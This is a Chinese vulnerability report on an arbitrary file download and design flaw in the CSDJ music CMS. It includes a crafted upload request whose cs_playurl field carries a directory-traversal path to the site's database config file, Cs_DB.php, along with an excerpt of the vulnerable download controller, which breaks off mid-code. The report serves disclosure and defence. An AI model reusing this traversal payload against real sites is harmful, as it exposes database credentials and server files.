程氏舞曲 任意文件下载与设计缺陷

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 有利用条件!烦。 ### 详细说明: 利用条件: 1、cms设置使用本机物理路径,就是上传文件存在本机服务器上。 2、后台关闭审核功能,或者通过审核。 条件1比较好达到,一般都在本机上。 条件2需要精心构造一下。 漏洞页面: user/music.php add_save()函数用来上传歌曲的,这里提交数据包。 ``` cs_name=%E6%B5%8B%E8%AF%95%E7%9A%84%E6%AD%8C%E6%9B%B2&cs_pic=20150401%2F253a23059b45f692bb48515d0efa6c95.jpg&cs_cid=1&cs_tid=0&cs_tags=%E6%8A%92%E6%83%85%2C%E5%A5%BD%E5%90%AC%2C%E6%84%9F%E5%8A%A8&cs_cion=0&cs_singer=&gslist=1&zm=B&cs_singerid=&cs_content=%E5%B0%B1%E6%98%AF%E8%A6%81%E5%85%8D%E8%B4%B9%E5%95%8A%EF%BC%81&cs_playurl=../../wamp/www/csdj/lib/Cs_DB.php&cs_dx=&cs_yz=&cs_sc=&token=665a3d28075f8ed1476afa1d0948ff7a ``` 注意里面的cs_playurl字段,一个目录跳转。这里没有任何限制。 通过了审核,或者自动审核的。不管- - 下载漏洞文件: app\controllers\dance.php ``` //数据下载页面 public function download() { header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); $this->load->model('CsdjUser'); $sid = $this->uri->segment(3); //方式,试听,下载 $type = intval($this->uri->segment(4)); //类型,普通,讯雷 $id =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息